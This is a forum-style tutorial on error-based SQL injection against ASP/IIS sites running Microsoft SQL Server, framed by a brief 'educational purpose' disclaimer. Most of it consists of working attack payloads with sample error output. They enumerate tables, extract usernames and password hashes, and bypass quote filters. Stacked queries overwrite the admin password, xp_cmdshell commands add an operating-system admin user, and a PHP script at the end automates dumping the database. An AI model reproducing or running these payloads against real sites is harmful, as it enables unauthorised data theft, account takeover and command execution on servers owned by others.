DISCLAIMER:THIS TUTORIAL IS SOLELY FOR EDUCATIONAL PURPOSE FOR PROTECTING YOUR OWN CODE FROM SQL INJECTIONS. YOU WILL HAVE TO TAKE THE FULL RESPONSIBILITY FOR ANY ACTION U DO AFTER READING THIS TUTORIAL.
Background
This article entitled "Complete MsSQL Injection For Newbies" intends to provide the complete knowledge and work-how of SQL injection specially targeted on MsSQL(ASP+IIS, because "it" occurs most frequently) database except the stacked query parts. First contribution over here...
0x00 The error output
Will be used only to cover injection, building queries and stuff like that, will not be described.
To begin, I want to see if we have found a bug, it does not necessarily mean that there is an injection. To check try to bring the version of MsSQL.
Target:
Code:
http://site.com/script.asp?id=5'
Code:
Microsoft OLE DB Provider for SQL Server error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string '5'.
/file.asp, line 1000
Errors may be different, depending on what is processed MsSQL (php, asp, cfm).
Obtain Version:
Code:
5' or 1=@@version--
Code:
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.3080.00 (Intel X86) Sep 6 2009 01:43:32 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)' to a column of data type int.
/file.asp, line 1000
The database name of the current user:
Code:
id=5' or 1=(select db_name())--
The user name of the owner of this base.
Code:
id=5' or 1=(select system_user)-- =>
0x01 Search the tables and columns.
Code:
5'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
Code:
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the nvarchar value 'table_name' to a column of data type int.
/file.asp, line 1000
Where table_name => name of the first table. How do you get the name of the 5th table? In MSSQL there is no function "limit", but there are other output options.
The first method. Using the method of exclusion (with the names of the tables).
Code:
5'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('table_name1','table_name4',table_name3','table_name4'))--
The second method. With the exception of the method (without specifying the table names).
Code:
5'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(SELECT+TOP+4+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES))--
The third method. With the help of the mathematical symbol ">" (with the "last" of the selected table.) In this method, then you can get at least 53423rd entry in the table, then we can not do option 1 and 2, because MsSQL trying to go through all the selected records that we want to avoid a NOT IN (more than 500 entries, the database is begins to slow down a good idea)).
Code:
5'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME>'table_name4')--
Column we obtain the same, only with a table COLUMNS
0x02 Data output
Suppose in the Users table is a column id (int), username (varchar), password (binary).
In order to display different types of data, we will have to use the data type conversion (cast, convert, etc ..)
We derive the first entry in the column id
Code:
5'+or+1=(select+top+1+cast(id+as+nvarchar)+from+Users)--
In response, we obtain:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value '1' to data type int.
/inc/file.asp, line 104
Sometimes the conversion function can not solve the problem, then the data can be displayed through the function which is used to convert selected data in XML format -> "FOR XML PATH", (since 2005 versions of MSSQL-Server) -> this function, we shall return.
Code:
5'+or+1=(select+top+1+cast(id+as+nvarchar)+from+Users+FOR+XML+PATH(''))--
It seems to have had more opportunity to withdraw without any tags, but forgot something like )=
Now let's take a cell from the column password, it seemed to be working well "cast (password + as + binary), but there are times when the FOR XML PATH, cast or convert does not give the desired result. Then you can search and other functions that are yet to nowhere not described. one of them. (".." - analog for access to the system table => 'dbo').
Code:
5'+or+1=(select+top+1+master..fn_varbintohexstr(password)+from+Users)--.
Now let's take just three cells with 3 different columns at a time (no mssql functions like concat () - in mysql, but here it is possible to connect dumb output in a single cell using the "%2B':'%2B". If my suspicions are correct, then the %2B(+) was interpreted as a MsSQL +(plus), not as a gap, due to which the union takes place).
Code:
5'+or+1=(SELECT+TOP+1+cast(id+as+nvarchar)%2B':'%2Bconvert(nvarchar,username)%2B':'%2Bmaster..fn_varbintohexstr(password)+FROM+Users)--
If all types of displays without errors, it can be so... TOP+1+id%2B':'%2Busername%2B':'%2Bpassword ... ;
In response, we obtain:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value '1:admin:e075739... ' to data type int.
/inc/file.asp, line 101
Can be a little easier, that is, to nvarchar for all output cells (be careful, quotename will return null, if the output data will be more than 258 bytes -> 128 characters in unicode).
Code:
5'+or+1=(SELECT+TOP+1+quotename(id%2B':'%2Busername)+FROM+Users)--
If the filter/magic_quotes, then change like this:
Code:
5'+or+1=(SELECT+TOP+1+column_name+FROM+information_schema.columns+where+table_name=char(85)%2Bchar(115)%2Bchar(101)%2Bchar(114)%2Bchar(115))--
0x03 Insert & Update
There is another plus in MsSQL + IIS, is that very often we can "tear off" a request by the sign ";" and then create a new one.
Everything is done in much the same.
Code:
5';+INSERT+INTO+Users+(id,username,pass)+VALUE+(1,'admin','mypass')--
Code:
5';+UPDATE+Users+set+password='mypass'+where+username='admin'--
The commands are executed.
If you have enough rights, usually the user "sa" (root in mysql), you can try to do something of the following commands:
How do I use ? Very simple, kill the request with a ";" and then create your request:
Code:
5';exec master..xp_cmdshell 'dir c:\'--
Code:
5';exec master..xp_cmdshell 'net user admin password /add'--
Bypassing the quotes:
Code:
5';exec master..xp_cmdshell [net user admin password /add]--
0x04 Dump
Theoretically, once drained the entire database via injection without the knowledge of database structure, it is impossible. But you can get information in the following ways. First, parse, 1 request - 1 record (later lay a parser). Second, the function to parse through the FOR XML RAW (it's ~ 2000 characters per request), the script will spread. Taken from pastebin.com
Code:
<?php
$host = "www.test.net";
$port = 80;
for($i=$j=0;;$i+=1990,$j++) {
$p = "GET /index.asp?id=1'".urlencode(" and 1= (SELECT convert(int,SUBSTRING((SELECT TABLE_NAME AS e FROM information_schema.TABLES FOR XML RAW ('a')),$i,1990)))--")." HTTP/1.0\r\n";
$p.= "Host: $host\r\n";
$p.= "Connection: close\r\n\r\n";
$ock = fsockopen(gethostbyname($host), $port);
if(!$ock) {
return false;
}
fputs($ock, $p);
$html='';
while(!feof($ock)) {
$html.= fgets($ock);
}
$html = explode("\r\n\r\n",$html);
if(stripos($html[1],'type mismatch')!==false) {
break;
}
$out = array();
preg_match("@the nvarchar value '(.+?)'*( to data type int\.)*</font>@", $html[1], $out);
if(isset($out[1])) {
$xml .= htmlspecialchars_decode($out[1]);
} else {
break;
}
}
$r = xml_parser_create();
$out = array();
xml_parse_into_struct($r, '<root>'.$xml, $out);
foreach($out as $el) {
echo $el['attributes']['E']."\r\n";
}